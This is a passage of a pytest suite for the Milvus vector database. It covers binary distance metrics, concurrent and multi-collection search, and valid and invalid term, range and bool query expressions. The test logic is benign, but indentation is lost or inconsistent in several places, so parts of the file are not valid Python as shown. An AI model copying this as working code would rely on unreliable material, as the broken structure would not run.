    def test_search_distance_hamming_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Hamming metric
        expected: the return distance equals to the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = hamming(query_int_vectors[0], int_vectors[0])
        distance_1 = hamming(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        # .astype(float): hamming() presumably returns a numpy integer — TODO confirm
        assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
    @pytest.mark.level(2)
    def test_search_distance_substructure_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection with the SUBSTRUCTURE metric
        method: search with new random binary entities and SUBSTRUCTURE metric type
        expected: empty result set (random vectors are not substructures of the inserted data)
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # distances are computed but intentionally unused: the assertion below
        # only checks that no match is returned
        distance_0 = substructure(query_int_vectors[0], int_vectors[0])
        distance_1 = substructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        metric_type="SUBSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert len(res[0]) == 0
    @pytest.mark.level(2)
    def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
        '''
        target: search binary_collection with the SUBSTRUCTURE metric
        method: search with query vectors derived (as sub-vectors) from the inserted entities
        expected: each query's top hit is the entity it was derived from, with ~zero distance
        '''
        top_k = 3
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
        # nq here is the module-level default — TODO confirm it equals 2 (one query per sub-vector)
        query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
                                        replace_vecs=query_vecs)
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert res[0][0].distance <= epsilon
        assert res[0][0].id == ids[0]
        assert res[1][0].distance <= epsilon
        assert res[1][0].id == ids[1]
    @pytest.mark.level(2)
    def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection with the SUPERSTRUCTURE metric
        method: search with new random binary entities and SUPERSTRUCTURE metric type
        expected: empty result set (random vectors are not superstructures of the inserted data)
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # distances are computed but intentionally unused: the assertion below
        # only checks that no match is returned
        distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
        distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
                                        metric_type="SUPERSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert len(res[0]) == 0
    @pytest.mark.level(2)
    def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
        '''
        target: search binary_collection with the SUPERSTRUCTURE metric
        method: search with query vectors derived (as super-vectors) from the inserted entities
        expected: both inserted entities are returned for each query with ~zero distance
        '''
        top_k = 3
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
        # nq here is the module-level default — TODO confirm it equals 2 (one query per super-vector)
        query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
                                        replace_vecs=query_vecs)
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert len(res[0]) == 2
        assert len(res[1]) == 2
        assert res[0][0].id in ids
        assert res[0][0].distance <= epsilon
        assert res[1][0].id in ids
        assert res[1][0].distance <= epsilon
    @pytest.mark.level(2)
    def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Tanimoto metric
        expected: the return distance equals to the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
        distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
    @pytest.mark.level(2)
    def test_search_multi_collections(self, connect, args):
        '''
        target: test search multi collections of L2
        method: add vectors into 10 collections, and search each of them
        expected: search status ok, top-1 hit is the matching inserted id
        '''
        num = 10
        top_k = 10
        nq = 20
        collection_names = []
        for i in range(num):
            collection = gen_unique_str(uid + str(i))
            connect.create_collection(collection, default_fields)
            collection_names.append(collection)
            entities, ids = init_data(connect, collection)
            assert len(ids) == default_nb
            # search_param is not defined locally — presumably a module-level default; verify
            query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
            connect.load_collection(collection)
            res = connect.search(collection, query)
            assert len(res) == nq
            for i in range(nq):
                assert check_id_result(res[i], ids[i])
                assert res[i]._distances[0] < epsilon
                assert res[i]._distances[1] > epsilon
        # cleanup: drop all collections created above
        for i in range(num):
            connect.drop_collection(collection_names[i])
    @pytest.mark.skip("r0.3-test")
    def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
        """
        target: test search with field, and let return entities less than topk
        method: insert entities and build ivf_ index, and search with field, n_probe=1
        expected: result entities carry the requested "int64" field, equal to their id
        """
        entities, ids = init_data(connect, id_collection, auto_id=False)
        simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
        connect.create_index(id_collection, field_name, simple_index)
        # logging.getLogger().info(connect.get_collection_info(id_collection))
        # top_k deliberately larger than what nprobe=1 can return
        top_k = 300
        default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
                                                              search_params={"nprobe": 1})
        expr = {"must": [gen_default_vector_expr(default_query)]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(id_collection)
        res = connect.search(id_collection, query, fields=["int64"])
        assert len(res) == nq
        for r in res[0]:
            assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
    @pytest.mark.level(2)
    def test_query_term_value_not_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where no inserted id matches the term value
        expected: each query returns an empty hit list
        '''
        entities, ids = init_data(connect, collection)
        # 100000 is outside the inserted id/value range, so the term filters everything out
        expr = {
            "must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    # TODO:
    @pytest.mark.level(2)
    def test_query_term_value_all_in(self, connect, collection):
        '''
        method: build query with vector and term expr matching exactly one inserted value
        expected: each query returns exactly one hit
        '''
        entities, ids = init_data(connect, collection)
        # the term matches a single value, so at most one entity can be returned
        expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 1
    # TODO:
    @pytest.mark.level(2)
    def test_query_term_values_not_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where no inserted value is in the term list
        expected: each query returns an empty hit list
        '''
        entities, ids = init_data(connect, collection)
        # 100000..100009 are all outside the inserted value range
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    # TODO:
    def test_query_term_values_all_in(self, connect, collection):
        '''
        method: build query with vector and the default term expr (matches the first half of ids)
        expected: full top_k returned, and every hit comes from the filtered first half
        '''
        entities, ids = init_data(connect, collection)
        expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
        # the default term expr presumably covers ids[:default_nb // 2] — TODO confirm
        limit = default_nb // 2
        for i in range(nq):
            for result in res[i]:
                logging.getLogger().info(result.id)
                assert result.id in ids[:limit]
    # TODO:
    def test_query_term_values_parts_in(self, connect, collection):
        '''
        method: build query with vector and term expr, where only part of the term values
                overlap the inserted data
        expected: full top_k still returned from the overlapping part
        '''
        entities, ids = init_data(connect, collection)
        # only the first half of this range overlaps the inserted values
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(
                             values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
    # TODO:
    @pytest.mark.level(2)
    def test_query_term_values_repeat(self, connect, collection):
        '''
        method: build query with vector and term expr whose value list repeats a single value
        expected: duplicates are collapsed — exactly one hit per query
        '''
        entities, ids = init_data(connect, collection)
        # the list contains the value 1 repeated default_nb-1 times
        expr = {
            "must": [gen_default_vector_expr(default_query),
                     gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 1
    # TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: return null
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_complex_dsl(self, connect, collection):
        '''
        method: query with complicated dsl (nested must/should combining term, range and vector)
        expected: no error raised
        '''
        expr = {"must": [
            {"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
            {"must": [gen_default_vector_expr(default_query)]}
        ]}
        logging.getLogger().info(expr)
        query = update_query_expr(default_query, expr=expr)
        logging.getLogger().info(query)
        connect.load_collection(collection)
        # smoke check only: no assertion on the result, just that search succeeds
        res = connect.search(collection, query)
        logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_query_term_key_error(self, connect, collection):
        '''
        method: build query with a misspelled term keyword ("terrm")
        expected: Exception raised
        '''
        expr = {"must": [gen_default_vector_expr(default_query),
                         gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.fixture(
        scope="function",
        params=gen_invalid_term()
    )
    def get_invalid_term(self, request):
        # parametrized fixture: yields each invalid term expr produced by gen_invalid_term()
        return request.param
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
        '''
        method: build query with a malformed term expr (from the get_invalid_term fixture)
        expected: Exception raised
        '''
        entities, ids = init_data(connect, collection)
        term = get_invalid_term
        expr = {"must": [gen_default_vector_expr(default_query), term]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.level(2)
    def test_query_term_field_named_term(self, connect, collection):
        '''
        method: create a collection with a field literally named "term" and query on it
        expected: search succeeds and returns full top_k
        '''
        term_fields = add_field_default(default_fields, field_name="term")
        collection_term = gen_unique_str("term")
        connect.create_collection(collection_term, term_fields)
        # NOTE(review): `entities` is not defined locally — presumably a module-level
        # default entity set; confirm
        term_entities = add_field(entities, field_name="term")
        ids = connect.insert(collection_term, term_entities)
        assert len(ids) == default_nb
        connect.flush([collection_term])
        # count = connect.count_entities(collection_term)
        # assert count == default_nb
        stats = connect.get_collection_stats(collection_term)
        assert stats["row_count"] == default_nb
        # outer "term" = expr keyword, inner "term" = the field name
        term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
        expr = {"must": [gen_default_vector_expr(default_query),
                         term_param]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection_term)
        res = connect.search(collection_term, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
        connect.drop_collection(collection_term)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_query_term_one_field_not_existed(self, connect, collection):
        '''
        method: build query with a two-field term, one field ("a") not in the schema
        expected: exception raised
        '''
        entities, ids = init_data(connect, collection)
        term = gen_default_term_expr()
        # inject a term on a nonexistent field alongside the valid one
        term["term"].update({"a": [0]})
        expr = {"must": [gen_default_vector_expr(default_query), term]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
    @pytest.fixture(
        scope="function",
        params=gen_invalid_range()
    )
    def get_invalid_range(self, request):
        # parametrized fixture: yields each invalid range expr produced by gen_invalid_range()
        return request.param
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
    @pytest.fixture(
        scope="function",
        params=gen_valid_ranges()
    )
    def get_valid_ranges(self, request):
        # parametrized fixture: yields each valid ranges dict produced by gen_valid_ranges()
        return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
    @pytest.mark.level(2)
    def test_query_multi_term_has_common(self, connect, collection):
        '''
        method: build query with multiple term exprs on the same field whose value sets overlap
        expected: full top_k returned from the intersection
        '''
        entities, ids = init_data(connect, collection)
        term_first = gen_default_term_expr()
        term_second = gen_default_term_expr(values=[i for i in range(default_nb // 3)])
        expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
    @pytest.mark.level(2)
    def test_query_multi_term_no_common(self, connect, collection):
        '''
        method: build query with multiple term exprs on the same field whose value sets are disjoint
        expected: empty hit list (intersection of the terms is empty)
        '''
        entities, ids = init_data(connect, collection)
        term_first = gen_default_term_expr()
        term_second = gen_default_term_expr(values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])
        expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    def test_query_multi_term_different_fields(self, connect, collection):
        '''
        method: build query with term exprs on different fields whose matched rows are disjoint
        expected: empty hit list (no row satisfies both terms)
        '''
        entities, ids = init_data(connect, collection)
        term_first = gen_default_term_expr()
        term_second = gen_default_term_expr(field="float",
                                            values=[float(i) for i in range(default_nb // 2, default_nb)])
        expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_query_single_term_multi_fields(self, connect, collection):
        '''
        method: build a single term expr that names two different fields at once
        expected: exception raised
        '''
        entities, ids = init_data(connect, collection)
        term_first = {"int64": {"values": [i for i in range(default_nb // 2)]}}
        term_second = {"float": {"values": [float(i) for i in range(default_nb // 2, default_nb)]}}
        term = update_term_expr({"term": {}}, [term_first, term_second])
        expr = {"must": [gen_default_vector_expr(default_query), term]}
        query = update_query_expr(default_query, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.level(2)
    def test_query_multi_range_has_common(self, connect, collection):
        '''
        method: build query with multiple range exprs on the same field whose intervals overlap
        expected: full top_k returned from the intersection
        '''
        entities, ids = init_data(connect, collection)
        range_one = gen_default_range_expr()
        range_two = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
        expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
    @pytest.mark.level(2)
    def test_query_multi_range_no_common(self, connect, collection):
        '''
        method: build query with multiple range exprs on the same field whose intervals are disjoint
        expected: empty hit list (intersection of the ranges is empty)
        '''
        entities, ids = init_data(connect, collection)
        range_one = gen_default_range_expr()
        range_two = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
        expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
    @pytest.mark.level(2)
    def test_query_multi_range_different_fields(self, connect, collection):
        '''
        method: build query with range exprs on different fields whose matched rows are disjoint
        expected: empty hit list (no row satisfies both ranges)
        '''
        entities, ids = init_data(connect, collection)
        range_first = gen_default_range_expr()
        range_second = gen_default_range_expr(field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
        expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
        query = update_query_expr(default_query, expr=expr)
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == 0
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
    '''
    method: build a single "range" clause that names two different fields
    expected: error raised -- one range expr may only target one field
    '''
    entities, ids = init_data(connect, collection)
    range_first = {"int64": {"GT": 0, "LT": default_nb // 2}}
    range_second = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
    # Merge both field constraints into one range expression (invalid).
    range = update_range_expr({"range": {}}, [range_first, range_second])
    expr = {"must": [gen_default_vector_expr(default_query), range]}
    query = update_query_expr(default_query, expr=expr)
    with pytest.raises(Exception) as e:
        res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
    """
    method: combine one term filter and one range filter whose interval
        overlaps the term values
    expected: search succeeds and returns full top-k result lists
    """
    init_data(connect, collection)
    filters = [
        gen_default_term_expr(),
        gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2}),
    ]
    bool_expr = {"must": [gen_default_vector_expr(default_query)] + filters}
    query = update_query_expr(default_query, expr=bool_expr)
    connect.load_collection(collection)
    results = connect.search(collection, query)
    assert len(results) == nq
    assert len(results[0]) == default_top_k
def test_query_single_term_range_no_common(self, connect, collection):
    '''
    method: build query with single term single range, where the range
        interval excludes all term values
    expected: pass; search succeeds but returns empty result lists
    '''
    entities, ids = init_data(connect, collection)
    term = gen_default_term_expr()
    # Range covers the upper half of ids -- presumably disjoint from the
    # default term values, hence zero hits expected below.
    range = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
    expr = {"must": [gen_default_vector_expr(default_query), term, range]}
    query = update_query_expr(default_query, expr=expr)
    connect.load_collection(collection)
    res = connect.search(collection, query)
    assert len(res) == nq
    assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_multi_vectors_same_field(self, connect, collection):
    '''
    method: build query with two vectors same field
    expected: error raised -- a bool.must may contain at most one vector
        clause per field
    '''
    entities, ids = init_data(connect, collection)
    vector1 = default_query
    vector2 = gen_query_vectors(field_name, entities, default_top_k, nq=2)
    expr = {
        "must": [vector1, vector2]
    }
    query = update_query_expr(default_query, expr=expr)
    with pytest.raises(Exception) as e:
        res = connect.search(collection, query)
class TestSearchDSLBools(object):
    """
    ******************************************************************
    # The following cases are used to build invalid query expr
    ******************************************************************
    Each test constructs a structurally invalid bool expression (wrong key,
    should/must_not without must, ...) and expects the server to reject it.
    """
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_query_no_bool(self, connect, collection):
        '''
        method: build query without bool expr
        expected: error raised
        '''
        entities, ids = init_data(connect, collection)
        # "bool1" is not a recognized top-level key.
        expr = {"bool1": {}}
        query = expr
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_should_only_term(self, connect, collection):
        '''
        method: build query without must, with should.term instead
        expected: error raised
        '''
        expr = {"should": gen_default_term_expr}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_query_should_only_vector(self, connect, collection):
        '''
        method: build query without must, with should.vector instead
        expected: error raised
        '''
        expr = {"should": default_query["bool"]["must"]}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.skip("bigsheep-search-without-load")
    def test_query_must_not_only_term(self, connect, collection):
        '''
        method: build query without must, with must_not.term instead
        expected: error raised
        '''
        expr = {"must_not": gen_default_term_expr}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.skip("bigsheep-search-without-load")
    def test_query_must_not_vector(self, connect, collection):
        '''
        method: build query without must, with must_not.vector instead
        expected: error raised
        '''
        expr = {"must_not": default_query["bool"]["must"]}
        query = update_query_expr(default_query, keep_old=False, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    @pytest.mark.skip("bigsheep-search-without-load")
    def test_query_must_should(self, connect, collection):
        '''
        method: build query must, and with should.term
        expected: error raised
        '''
        expr = {"should": gen_default_term_expr}
        query = update_query_expr(default_query, keep_old=True, expr=expr)
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
    """
    Test search collection with invalid collection names
    """
    # Fixtures below are parameterized over generated invalid strings, so
    # every test using them runs once per invalid value.
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_invalid_partition(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_invalid_field(self, request):
        yield request.param
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param
    @pytest.mark.skip("bigsheep-search-without-load")
    @pytest.mark.level(2)
    def test_search_with_invalid_collection(self, connect, get_collection_name):
        # Searching a collection whose name is invalid must raise.
        collection_name = get_collection_name
